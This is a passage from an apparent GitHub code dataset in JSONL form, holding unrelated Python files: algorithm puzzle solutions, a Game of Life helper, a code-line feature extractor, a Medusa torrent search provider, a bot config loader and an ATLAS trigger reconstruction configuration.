Your answer will be accepted if it differs from the correct answer by at most 1e-5.\r\n'''\r\n\r\nclass Solution:\r\n def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\r\n graph = defaultdict(list)\r\n\r\n for i, (a,b) in enumerate(edges):\r\n graph[a].append([b, succProb[i]])\r\n graph[b].append([a, succProb[i]])\r\n \r\n # Set max probability of reaching a node to 0\r\n max_prob = [0.0] * n\r\n max_prob[start] = 1.0\r\n\r\n queue = deque([start])\r\n # Search for path using all neighbouring nodes\r\n while queue:\r\n cur_node = queue.popleft()\r\n\r\n for nxt_node, path_prob in graph[cur_node]:\r\n # Update probability only if current path increases\r\n if max_prob[cur_node] * path_prob > max_prob[nxt_node]:\r\n max_prob[nxt_node] = max_prob[cur_node] * path_prob\r\n queue.append(nxt_node)\r\n\r\n return max_prob[end]","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"JuneChallenge_2023/PathMaximumProbability.py","file_name":"PathMaximumProbability.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2140302719","text":"import numpy as np\n\ndef get_cell_next_state(row, col, board): \n cell = board[row][col]\n live_neigh = get_live_neighbors(row, col, board)\n if cell == 0:\n if live_neigh == 3:\n return 1\n else:\n return 0\n else:\n if live_neigh == 2 or live_neigh == 3:\n return 1\n else: \n return 0\n\n\ndef get_live_neighbors(row, col, board): \n neighbors = []\n for i in range(row-1, row+2):\n for j in range(col-1, col+2):\n neighbors = np.append(neighbors, board[i][j])\n neighbors = np.delete(neighbors, 4)\n return np.sum(neighbors)","repo_name":"karolina-cz/Game-of-life-parallel","sub_path":"cell_utils.py","file_name":"cell_utils.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30783581551","text":"import sys\nfrom io import IOBase, BytesIO\nfrom os import read, write, fstat\nfrom typing import List, Tuple\nfrom copy import deepcopy\n################################################################################\n\"\"\"Обертка для быстрого ввода/вывода\"\"\"\n\nBUFSIZE = 8192\n\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = read(self._fd, max(fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self, size: int = ...):\n while self.newlines == 0:\n b = read(self._fd, max(fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n 
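# readline, like read above, decodes the buffered bytes back to str\n        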
self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\n\nstdin, stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\n\n\ndef split_input():\n    return stdin.readline().split()\n\n\ndef _input():\n    return stdin.readline()\n################################################################################\n\n\ndef longest_subsequence(size: int, sequence: List[int]) -> Tuple[int, List[int]]:\n    \"\"\"Returns the length of the longest increasing subsequence and the subsequence itself\"\"\"\n    dynamic = [None] * size\n    ancestors = dynamic[:]\n    dynamic[0] = 1\n    ancestors[0] = -1\n\n    for i in range(1, size):\n        dynamic[i], ancestors[i] = max((dynamic[j] + 1, j) if sequence[j] < sequence[i] else (1, -1) for j in range(i))\n\n    subs_idx, subs_length = max(enumerate(dynamic), key=lambda x: x[1])\n\n    subsequence = [sequence[subs_idx]]\n    while ancestors[subs_idx] != -1:\n        idx = ancestors[subs_idx]\n        elm = sequence[idx]\n        subsequence.append(elm)\n        subs_idx = ancestors[subs_idx]\n    subsequence.reverse()\n\n    return subs_length, subsequence\n\n\ndef main() -> None:\n    \"\"\"Read the input, process it, write the output\"\"\"\n    size = int(_input())\n    sequence = [int(x) for x in split_input()]\n    subs_length, subsequence = longest_subsequence(size, sequence)\n    ans = str(subs_length) + \"\\n\" + \" \".join(map(str, subsequence))\n    stdout.write(ans)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ZingyKizz/MADE","sub_path":"algo/6/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27691867584","text":"import re\nimport enchant\nimport json\n\nprevInChain=0\nbraceCount=0\ncommentBlock=\"\"\nencModel=enchant.Dict(\"en_US\")\n\nwith open('featureConfig.json') as data_file: \n\tconf = json.load(data_file)\n\nkeywords= conf[\"keywords\"]\noperatorList= conf[\"operatorList\"]\ncommentSingle= conf[\"commentSingle\"]\ncommentMultiple= conf[\"commentMultiple\"]\ndataFile= conf[\"dataFile\"]\n#self.commentDict= conf[\"commentDict\"]\n\ncommentDict={}\nfor cS in commentSingle:\n\tcommentDict[cS]=0\nfor cM in commentMultiple:\n\tcommentDict[cM[0]]=1\n\ndef ratioK(s):\n\tsW=[ele for ele in re.split(\"[^A-Za-z0-9_$]\",s) if ele!=\"\"]\t\n\tl=len(sW)\n\tc=0.0\n\tfor ele in sW:\n\t\tif ele in keywords:\n\t\t\tc+=1\n\tif float(l)!=0.0:\n\t\treturn c/l\n\treturn 0.0\n\ndef operators(s):\n\t#operatorList=[\"+\",\"-\",\"*\",\"/\",\"^\",\"%\",\">\",\"<\",\"=\"]\t#set\n\tfor ele in operatorList:\n\t\tif ele in s:\n\t\t\treturn 1.0\n\treturn 0.0\n\ndef comments(s):\n\tglobal commentBlock\n\t# commentSingle=[\"//\"]\t#set\n\t# commentMultiple=[[\"/*\",\"*/\"],[\"/**\",\"*/\"]]\t#set\n\t# commentDict={\"//\":0,\"/*\":1,\"/**\":1}\n\tif commentBlock!=\"\":\n\t\tfor ele in commentMultiple:\n\t\t\tif ele[0]==commentBlock:\n\t\t\t\tif ele[1] in s:\n\t\t\t\t\tcommentBlock=\"\"\n\t\treturn 1.0\n\telse:\n\t\tcIndex=9999\n\t\tcValue=-1\n\t\tfor k,v in commentDict.items():\n\t\t\tif k in s and cIndex>s.index(k):\n\t\t\t\tcIndex=s.index(k)\n\t\t\t\tcValue=v\n\t\tif cValue==0:\n\t\t\treturn 1.0\n\t\telif cValue==1:\n\t\t\tfor ele in commentMultiple:\n\t\t\t\tif ele[0] in s:\n\t\t\t\t\tif ele[1] not in s:\n\t\t\t\t\t\tcommentBlock=ele[0]\n\t\t\treturn 1.0\n\t\telse:\n\t\t\treturn 0.0\n\treturn 0.0\n\ndef braces(s):\n\tglobal braceCount\n\ttmp=0\n\tif \"{\" in s:\n\t\tbraceCount+=1\n\tif braceCount>0:\n\t\ttmp=1\n\tif \"}\" in s:\n\t\tbraceCount-=1\n\treturn float(tmp)\n\ndef indent(s):\n\tif s[0]==\" \" or 
s[0]==\"\\t\":\r\n\t\treturn 1.0\r\n\treturn 0.0\r\n\r\ndef semicolon(s):\r\n\tif s[-1]==\";\":\r\n\t\treturn 1.0\r\n\treturn 0.0\r\n\r\ndef programChain():\r\n\tglobal prevInChain\r\n\tif prevInChain==1:\r\n\t\tprevInChain=0\r\n\t\treturn 1.0\r\n\treturn 0.0\r\n\r\ndef capital(s):\r\n\tfor i in s:\r\n\t\tif i==\" \" or i==\"\\t\":\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tif i>=\"a\" and i<=\"z\":\r\n\t\t\t\treturn 1.0\r\n\t\t\treturn 0.0\r\n\treturn 0.0\r\n\r\ndef ratioC(s):\r\n\tsW=[ele for ele in re.split(\"[^A-Za-z0-9_$]\",s) if ele!=\"\" and ele not in keywords]\t\r\n\tl=len(sW)\r\n\tc=0.0\r\n\tfor ele in sW:\r\n\t\tif encModel.check(ele):\r\n\t\t\tc+=1\r\n\tif float(l)!=0.0:\r\n\t\treturn 1.0-c/l\r\n\treturn 1.0\r\n\r\ndef run():\r\n\tglobal prevInChain\r\n\tfp1=open(dataFile,\"r\")\r\n\tfp2=open(\"javaTr.txt\",\"w\")\r\n\tfor ln in fp1.read().split(\"\\n\")[:-1]:\r\n\t\tvec=ln[-1]\r\n\t\tln=ln[:-1]\r\n\t\tvec=[str(ratioK(ln)),str(operators(ln)),str(comments(ln)),str(braces(ln)),str(indent(ln)),str(semicolon(ln)),str(programChain()),str(capital(ln)),str(ratioC(ln)),str(float(int(vec)))]\r\n\t\tprevInChain=0\r\n\t\tif vec[-1]==\"1.0\":\r\n\t\t\tprevInChain=1\r\n\t\tfp2.write(\"\\t\".join(vec))\r\n\t\tfp2.write(\"\\n\")\r\n\tfp1.close()\r\n\tfp2.close()\r\n\r\n# run()","repo_name":"TheHereticDruid/AQGDiscourse","sub_path":"dataGen.py","file_name":"dataGen.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73096958","text":"# coding=utf-8\n\n\"\"\"Provider code for EliteTorrent.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\nimport re\n\nfrom medusa import tv\nfrom medusa.bs4_parser import BS4Parser\nfrom medusa.helper.common import try_int\nfrom medusa.logger.adapters.style import BraceAdapter\nfrom medusa.providers.torrent.torrent_provider import TorrentProvider\n\nfrom requests.compat import urljoin\n\nlog = BraceAdapter(logging.getLogger(__name__))\nlog.logger.addHandler(logging.NullHandler())\n\n\nclass EliteTorrentProvider(TorrentProvider):\n    \"\"\"EliteTorrent Torrent provider.\"\"\"\n\n    id_regex = re.compile(r'/torrent/(\\d+)')\n\n    def __init__(self):\n        \"\"\"Initialize the class.\"\"\"\n        super(EliteTorrentProvider, self).__init__('EliteTorrent')\n\n        # Credentials\n        self.public = True\n\n        # URLs\n        self.url = 'https://elitetorrent.eu'\n        self.urls = {\n            'base_url': self.url,\n            'search': urljoin(self.url, 'torrents.php'),\n            'download': urljoin(self.url, 'get-torrent/{0}'),\n        }\n\n        # Proper Strings\n\n        # Miscellaneous Options\n        self.onlyspasearch = None\n\n        # Torrent Stats\n        self.minseed = None\n        self.minleech = None\n\n        # Cache\n        self.cache = tv.Cache(self, min_time=20)\n\n    def search(self, search_strings, age=0, ep_obj=None, **kwargs):\n        \"\"\"\n        Search a provider and parse the results.\n\n        :param search_strings: A dict with mode (key) and the search value (value)\n        :param age: Not used\n        :param ep_obj: Not used\n        :returns: A list of search results (structure)\n        \"\"\"\n        results = []\n        lang_info = '' if not ep_obj or not ep_obj.series else ep_obj.series.lang\n\n        # Search query:\n        # http://www.elitetorrent.net/torrents.php?cat=4&modo=listado&orden=fecha&pag=1&buscar=fringe\n        # Search Params\n        search_params = {\n            'cat': 4, # Shows\n            'modo': 'listado', # display results mode\n            'orden': 'fecha', # date order\n            'pag': 1, # page number\n            'buscar': '', # Search show\n        }\n\n        for mode in search_strings:\n            log.debug('Search mode: {0}', mode)\n\n            # Only search if user conditions are true\n            if self.onlyspasearch and lang_info != 'es' and mode != 'RSS':\n                log.debug('Show info is not 
Spanish, skipping provider search')\n continue\n\n for search_string in search_strings[mode]:\n\n if mode != 'RSS':\n search_string = re.sub(r'S0?(\\d+)E(\\d+)', r'\\1x\\2', search_string)\n search_params['buscar'] = search_string\n\n log.debug('Search string: {search}',\n {'search': search_string})\n\n response = self.session.get(self.urls['search'], params=search_params)\n if not response or not response.text:\n log.debug('No data returned from provider')\n continue\n\n results += self.parse(response.text, mode)\n\n return results\n\n def parse(self, data, mode):\n \"\"\"\n Parse search results for items.\n\n :param data: The raw response from a search\n :param mode: The current mode used to search, e.g. RSS\n\n :return: A list of items found\n \"\"\"\n items = []\n\n with BS4Parser(data, 'html5lib') as html:\n torrent_table = html.find('table', class_='fichas-listado')\n torrent_rows = torrent_table('tr') if torrent_table else []\n\n # Continue only if at least one release is found\n if len(torrent_rows) < 2:\n log.debug('Data returned from provider does not contain any torrents')\n return items\n\n # Skip column headers\n for row in torrent_rows[1:]:\n try:\n title = self._process_title(row.find('a', class_='nombre')['title'])\n torrent_id = EliteTorrentProvider.id_regex.match(row.find('a')['href'])\n if not all([title, torrent_id]):\n continue\n\n download_url = self.urls['download'].format(torrent_id.group(1))\n\n seeders = try_int(row.find('td', class_='semillas').get_text(strip=True))\n leechers = try_int(row.find('td', class_='clientes').get_text(strip=True))\n\n # Filter unseeded torrent\n if seeders < min(self.minseed, 1):\n if mode != 'RSS':\n log.debug(\"Discarding torrent because it doesn't meet the\"\n \" minimum seeders: {0}. Seeders: {1}\",\n title, seeders)\n continue\n\n size = -1 # Provider does not provide size\n\n item = {\n 'title': title,\n 'link': download_url,\n 'size': size,\n 'seeders': seeders,\n 'leechers': leechers,\n 'pubdate': None,\n }\n if mode != 'RSS':\n log.debug('Found result: {0} with {1} seeders and {2} leechers',\n title, seeders, leechers)\n\n items.append(item)\n except (AttributeError, TypeError, KeyError, ValueError, IndexError):\n log.exception('Failed parsing provider.')\n\n return items\n\n @staticmethod\n def _process_title(title):\n if title:\n # Quality, if no literal is defined it's HDTV\n if 'calidad' not in title:\n title += ' HDTV x264'\n else:\n title = title.replace('(calidad baja)', 'HDTV x264')\n title = title.replace('(Buena calidad)', '720p HDTV x264')\n title = title.replace('(Alta calidad)', '720p HDTV x264')\n title = title.replace('(calidad regular)', 'DVDrip x264')\n title = title.replace('(calidad media)', 'DVDrip x264')\n\n # Language, all results from this provider have spanish audio,\n # We append it to title (to avoid downloading undesired torrents)\n title += ' SPANISH AUDIO-ELITETORRENT'\n\n return title\n\n\nprovider = EliteTorrentProvider()\n","repo_name":"smoresmores/Medusa","sub_path":"medusa/providers/torrent/html/elitetorrent.py","file_name":"elitetorrent.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"11267835927","text":"from dataIO import dataIO\nimport os\n\nconfig_FILEPATH = os.getcwd() + '/rsc/config.json'\n\nif dataIO.is_valid_json(config_FILEPATH):\n config = dataIO._read_json(config_FILEPATH)\nelse:\n config = {\n\t\t\"access_token\": os.environ[\"ACCESS_TOKEN\"],\n\t\t\"client_id\": 
os.environ[\"CLIENT_ID\"],\n \"client_id_secret\": os.environ[\"CLIENT_ID_SECRET\"],\n\t\t\"prefix\": \"!\"\n }","repo_name":"Rindo93/mpu","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7330859528","text":"#!/usr/bin/python3\nfrom typing import List, Tuple\n\n\nfile = './sample.txt' if 0 else './input.txt'\n\n\nclass Grid:\n def __init__(self, grid: List[List[str]]) -> None:\n self.grid = grid\n self.changed = False\n self.width = len(self.grid[0])\n self.height = len(self.grid)\n\n def step(self):\n self.changed = False\n self.move('>', (1, 0))\n self.move('v', (0, 1))\n return self.changed\n\n def move(self, val: str, dir: Tuple[int, int]):\n visited = set()\n for y, row in enumerate(self.grid):\n for x, cell in enumerate(row):\n if (x, y) in visited:\n continue\n if cell != '.':\n visited.add((x, y))\n if cell == val:\n new_y = (y+dir[1]) % self.height\n new_x = (x+dir[0]) % self.width\n if (new_x, new_y) not in visited and self.grid[new_y][new_x] == '.':\n self.grid[new_y][new_x] = val\n self.grid[y][x] = '.'\n self.changed = True\n visited.add((new_x, new_y))\n\n def __repr__(self):\n return '\\n'.join([''.join(row) for row in self.grid])\n\n\ndef part1():\n with open(file) as f:\n data = f.read()\n\n grid = [[cell for cell in row] for row in data.splitlines()]\n grid = Grid(grid)\n i = 1\n while grid.step():\n i += 1\n print(f'part1: {i}')\n\n\ndef part2():\n pass\n\n\nif __name__ == '__main__':\n part1()\n # part2()\n","repo_name":"idanzur/aoc-2021","sub_path":"25/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71109922113","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\nfrom AthenaConfiguration.Enums import Format\nfrom TrigT1ResultByteStream.TrigT1ResultByteStreamConfig import L1TriggerByteStreamDecoderCfg\nfrom TrigConfigSvc.TrigConfigSvcCfg import TrigConfigSvcCfg\nfrom TriggerJobOpts.TriggerByteStreamConfig import ByteStreamReadCfg\nfrom TrigEDMConfig.TriggerEDM import getTriggerEDMList\nfrom TrigEDMConfig.Utils import edmDictToList\nfrom OutputStreamAthenaPool.OutputStreamConfig import addToAOD, addToESD\n\nfrom AthenaCommon.Logging import logging\nlog = logging.getLogger('TriggerRecoConfig')\n\n\ndef TriggerRecoCfg(flags):\n if flags.Input.isMC:\n return TriggerRecoCfgMC(flags)\n else:\n return TriggerRecoCfgData(flags)\n\ndef TriggerRecoCfgData(flags):\n \"\"\" Configures trigger data decoding\n Run 3 data:\n HLTResultMTByteStreamDecoderAlg -> TriggerEDMDeserialiserAlg\n\n Run 2 data:\n TrigBSExtraction -> TrigDecisionMaker -> DecisionConv to xAOD -> NavigationConv to xAOD\n\n Run 1 data:\n as for Run 2 + Run 1 EDM to xAOD conversion\n \"\"\"\n log.debug(\"TriggerRecoCfgData: Preparing the trigger handling of reconstruction of data\")\n acc = ComponentAccumulator()\n acc.merge( ByteStreamReadCfg(flags) )\n if flags.Trigger.L1.doMuon or flags.Trigger.L1.doCalo or flags.Trigger.L1.doTopo or flags.Trigger.L1.doCTP:\n acc.merge( L1TriggerByteStreamDecoderCfg(flags) )\n\n metadataAcc, _ = TriggerMetadataWriterCfg(flags)\n acc.merge( metadataAcc )\n\n # Run 3+\n if flags.Trigger.EDMVersion >= 3:\n acc.merge(Run3TriggerBSUnpackingCfg(flags))\n\n from TrigDecisionMaker.TrigDecisionMakerConfig import 
Run3DecisionMakerCfg\n acc.merge(Run3DecisionMakerCfg(flags))\n\n from TrigNavSlimmingMT.TrigNavSlimmingMTConfig import TrigNavSlimmingMTCfg\n acc.merge(TrigNavSlimmingMTCfg(flags))\n\n # Run 1+2\n elif flags.Trigger.EDMVersion in [1, 2]:\n acc.merge( Run1Run2BSExtractionCfg(flags) )\n\n from TrigDecisionMaker.TrigDecisionMakerConfig import Run1Run2DecisionMakerCfg\n acc.merge (Run1Run2DecisionMakerCfg(flags) )\n\n acc.merge(Run2Run1NavigationSlimingCfg(flags))\n else:\n raise RuntimeError(\"Invalid EDMVersion=%s \" % flags.Trigger.EDMVersion)\n\n # Legacy L1Calo, L1Topo reco\n if flags.Trigger.enableL1CaloLegacy:\n from AnalysisTriggerAlgs.AnalysisTriggerAlgsCAConfig import RoIBResultToxAODCfg\n xRoIBResultAcc, _ = RoIBResultToxAODCfg(flags)\n acc.merge( xRoIBResultAcc )\n\n if flags.Input.Format is Format.BS:\n from L1TopoByteStream.L1TopoByteStreamConfig import L1TopoRawDataContainerBSCnvCfg\n acc.merge( L1TopoRawDataContainerBSCnvCfg(flags) )\n topoEDM = ['xAOD::L1TopoRawDataContainer#L1TopoRawData',\n 'xAOD::L1TopoRawDataAuxContainer#L1TopoRawDataAux.']\n acc.merge(addToESD(flags, topoEDM))\n acc.merge(addToAOD(flags, topoEDM))\n\n acc.merge(TriggerEDMCfg(flags))\n\n return acc\n\ndef TriggerRecoCfgMC(flags):\n \"\"\" Configures trigger MC handing during reconstruction\n Run 3 MC:\n Propagation of HLT collections from input RDO_TRIG to output POOL files\n Execution of reconstruction-level trigger navigation slimming\n\n RDO_TRIG containing simulation of the Run 1, Run 2 trigger:\n Not currently supported.\n \"\"\"\n\n # Check for currently unsuported operational modes, these may be supported in the future if needed\n if flags.Input.Format is Format.BS:\n log.warning(\"TriggerRecoCfgMC does not currently support MC files encoded as bytestream. Switching off handling of trigger inputs.\")\n return ComponentAccumulator()\n if flags.Trigger.EDMVersion in [1, 2]:\n log.warning(\"TriggerRecoCfgMC does not currently support MC files with Run 1 or Run 2 trigger payload. 
Switching off handling of trigger inputs.\")\n return ComponentAccumulator()\n\n log.debug(\"TriggerRecoCfgMC: Preparing the trigger handling of reconstruction of MC\")\n acc = ComponentAccumulator()\n\n from TrigNavSlimmingMT.TrigNavSlimmingMTConfig import TrigNavSlimmingMTCfg\n acc.merge(TrigNavSlimmingMTCfg(flags))\n\n acc.merge(TriggerEDMCfg(flags))\n\n return acc\n\ndef TriggerMetadataWriterCfg(flags):\n \"\"\"Sets up access to HLT, L1, BGRP, Monitoring, HLT PS and L1 PS JSON files from 'FILE' or 'DB', writes JSON to metaStore and keys to eventStore\"\"\"\n acc = ComponentAccumulator()\n keyWriterOutput = \"\"\n if flags.Trigger.triggerConfig != 'INFILE':\n acc.merge( TrigConfigSvcCfg(flags) )\n keyWriterTool = CompFactory.TrigConf.KeyWriterTool(\"KeyWriterToolOffline\")\n keyWriterOutput = str(keyWriterTool.ConfKeys)\n acc.addEventAlgo( CompFactory.TrigConf.xAODMenuWriterMT(\"xAODMenuWriterMT\", KeyWriterTool = keyWriterTool) )\n return acc, keyWriterOutput\n\ndef TriggerEDMCfg(flags):\n \"\"\"Configures which trigger collections are recorded\"\"\"\n acc = ComponentAccumulator()\n\n # Check if we have anything to do\n if flags.Output.doWriteESD is False and flags.Output.doWriteAOD is False:\n log.debug(\"TriggerEDMCfg: Nothing to do as both Output.doWriteAOD and Output.doWriteESD are False\")\n return acc\n\n # standard collections & metadata\n # TODO consider unifying with TriggerConfig.triggerPOOLOutputCfg - there the assumption is that Run3 \n # metadata\n menuMetadata = [\"xAOD::TriggerMenuJsonContainer#*\", \"xAOD::TriggerMenuJsonAuxContainer#*\",]\n if flags.Trigger.EDMVersion in [1,2]:\n menuMetadata += ['xAOD::TriggerMenuAuxContainer#*', 'xAOD::TriggerMenuContainer#*',]\n # Add LVL1 collections (for Run-3 they are part of the \"regular\" EDM lists)\n from TrigEDMConfig.TriggerEDM import getLvl1ESDList, getLvl1AODList\n acc.merge(addToESD(flags, edmDictToList(getLvl1ESDList())))\n acc.merge(addToAOD(flags, edmDictToList(getLvl1AODList())))\n\n edmVersion = max(2, flags.Trigger.EDMVersion)\n _TriggerESDList = getTriggerEDMList(flags.Trigger.ESDEDMSet, edmVersion)\n _TriggerAODList = getTriggerEDMList(flags.Trigger.AODEDMSet, edmVersion)\n log.debug(\"ESD EDM list: %s\", _TriggerESDList)\n log.debug(\"AOD EDM list: %s\", _TriggerAODList)\n \n # Highlight what is in AOD list but not in ESD list, as this can cause\n # the \"different number of entries in branch\" problem, when it is in the\n # AOD list but the empty container per event is not created\n # Just compares keys of dicts, which are the class names, not their string keys in StoreGate\n not_in = [ element for element in _TriggerAODList if element not in _TriggerESDList ]\n if (len(not_in)>0):\n log.warning(\"In AOD list but not in ESD list: \")\n log.warning(not_in)\n else:\n log.info(\"AOD list is subset of ESD list - good.\")\n\n # there is internal gating in addTo* if AOD or ESD do not need to be written out\n acc.merge(addToESD(flags, edmDictToList(_TriggerESDList), MetadataItemList = menuMetadata))\n acc.merge(addToAOD(flags, edmDictToList(_TriggerAODList), MetadataItemList = menuMetadata))\n \n log.info(\"AOD content set according to the AODEDMSet flag: %s and EDM version %d\", flags.Trigger.AODEDMSet, flags.Trigger.EDMVersion)\n # navigation for Run 3\n if flags.Trigger.EDMVersion == 3 and not flags.Trigger.doOnlineNavigationCompactification and not flags.Trigger.doNavigationSlimming:\n nav = ['xAOD::TrigCompositeContainer#HLTNav*', 'xAOD::TrigCompositeAuxContainer#HLTNav*',]\n acc.merge(addToAOD(flags, nav))\n 
acc.merge(addToESD(flags, nav))\n # extra jet keys\n jetSpecials = [\"JetKeyDescriptor#JetKeyMap\", \"JetMomentMap#TrigJetRecMomentMap\",]\n acc.merge(addToESD(flags, jetSpecials))\n acc.merge(addToAOD(flags, jetSpecials))\n\n # RoIs\n if flags.Output.doWriteAOD and flags.Trigger.EDMVersion == 2:\n from TrigRoiConversion.TrigRoiConversionConfig import RoiWriterCfg\n acc.merge(RoiWriterCfg(flags))\n\n return acc\n\ndef Run2Run1NavigationSlimingCfg(flags):\n \"\"\"Configures legacy Run1/2 navigation slimming\"\"\"\n acc = ComponentAccumulator()\n\n if flags.Trigger.DecodeHLT is False:\n log.debug(\"Run2Run1NavigationSlimingCfg: Nothing to do as Trigger.DecodeHLT is False\")\n return acc\n\n if flags.Trigger.doNavigationSlimming is False:\n log.debug(\"Run2Run1NavigationSlimingCfg: Nothing to do as Trigger.doNavigationSlimming is False\")\n return acc\n\n def _flatten(edm):\n return list(y.split('-')[0] for x in edm.values() for y in x)\n from TrigNavTools.TrigNavToolsConfig import TrigNavigationThinningSvcCfg\n \n from OutputStreamAthenaPool.OutputStreamConfig import OutputStreamCfg\n\n if flags.Output.doWriteAOD:\n _TriggerAODList = getTriggerEDMList(flags.Trigger.AODEDMSet, flags.Trigger.EDMVersion)\n thinningSvc = acc.getPrimaryAndMerge(TrigNavigationThinningSvcCfg(flags, \n {'name' : 'HLTNav_StreamAOD',\n 'mode' : 'cleanup_noreload', \n 'result' : 'HLTResult_HLT',\n 'features' : _flatten(_TriggerAODList)}))\n acc.merge(OutputStreamCfg(flags, \"AOD\", trigNavThinningSvc = thinningSvc))\n\n if flags.Output.doWriteESD:\n _TriggerESDList = getTriggerEDMList(flags.Trigger.ESDEDMSet, flags.Trigger.EDMVersion)\n thinningSvc = acc.getPrimaryAndMerge(TrigNavigationThinningSvcCfg(flags,\n {'name' : 'HLTNav_StreamESD',\n 'mode' : 'cleanup_noreload', \n 'result' : 'HLTResult_HLT',\n 'features' : _flatten(_TriggerESDList)}))\n acc.merge(OutputStreamCfg(flags, \"ESD\", trigNavThinningSvc = thinningSvc))\n\n return acc\n\n\ndef Run1Run2BSExtractionCfg( flags ):\n \"\"\"Configures Trigger data from BS extraction \"\"\"\n from SGComps.AddressRemappingConfig import InputRenameCfg\n\n acc = ComponentAccumulator()\n extr = CompFactory.TrigBSExtraction()\n robIDMap = {} # map of result keys and their ROB ID\n\n # Add fictional output to ensure data dependency in AthenaMT\n extr.ExtraOutputs += [(\"TrigBSExtractionOutput\", \"StoreGateSvc+TrigBSExtractionOutput\")]\n\n if flags.Trigger.DecodeHLT:\n # Run-1: add xAOD conversion tool\n if flags.Trigger.EDMVersion == 1:\n extr.BStoxAOD = acc.popToolsAndMerge( Run1xAODConversionCfg(flags) )\n\n serialiserTool = CompFactory.TrigTSerializer()\n acc.addPublicTool(serialiserTool)\n extr.NavigationForL2 = CompFactory.HLT.Navigation(\"NavigationForL2\", \n ClassesFromPayloadIgnore = [\"TrigPassBits#passbits\"]) # Ignore the L2 TrigPassBits to avoid clash with EF (ATR-23411)\n\n extr.Navigation = CompFactory.HLT.Navigation(\"Navigation\")\n from TrigEDMConfig.TriggerEDM import getEDMLibraries\n extr.Navigation.Dlls = getEDMLibraries() \n from TrigEDMConfig.TriggerEDM import getPreregistrationList\n extr.Navigation.ClassesToPreregister = getPreregistrationList(flags.Trigger.EDMVersion)\n from eformat import helper as efh\n \n if flags.Trigger.EDMVersion == 1: # Run-1 has L2 and EF result\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_L2\", \"HLTResult_L2_BS\"))\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_EF\", \"HLTResult_EF_BS\"))\n robIDMap[\"HLTResult_L2_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_LVL2, 0).code()\n 
robIDMap[\"HLTResult_EF_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_EVENT_FILTER, 0).code()\n extr.L2ResultKeyIn = \"HLTResult_L2_BS\"\n extr.L2ResultKeyOut = \"HLTResult_L2\"\n extr.HLTResultKeyIn = \"HLTResult_EF_BS\"\n extr.HLTResultKeyOut = \"HLTResult_EF\"\n else:\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_HLT\", \"HLTResult_HLT_BS\"))\n robIDMap[\"HLTResult_HLT_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_HLT, 0).code()\n extr.HLTResultKeyIn = \"HLTResult_HLT_BS\"\n extr.HLTResultKeyOut = \"HLTResult_HLT\"\n \n # Configure Run-2 DataScouting\n if flags.Trigger.EDMVersion == 2:\n stream = flags.Input.TriggerStream\n if stream.startswith('calibration_DataScouting_'):\n ds_tag = '_'.join(stream.split('_')[1:3]) # e.g. DataScouting_05\n ds_id = int(stream.split('_')[2]) # e.g. 05\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", ds_tag, ds_tag+\"_BS\"))\n robIDMap[ds_tag+\"_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_HLT, ds_id).code()\n extr.DSResultKeysIn += [ ds_tag+\"_BS\" ]\n extr.DSResultKeysOut += [ ds_tag ]\n\n else:\n log.info(\"Will not schedule real HLT bytestream extraction, instead EDM gap filling is running\")\n # if data doesn't have HLT info set HLTResult keys as empty strings to avoid warnings\n # but the extraction algorithm must run\n extr.HLTResultKeyIn = \"\"\n extr.HLTResultKeyOut = \"\"\n\n HLTResults = [ f\"HLT::HLTResult/{k}\" for k in robIDMap.keys() ]\n acc.addService( CompFactory.ByteStreamAddressProviderSvc( 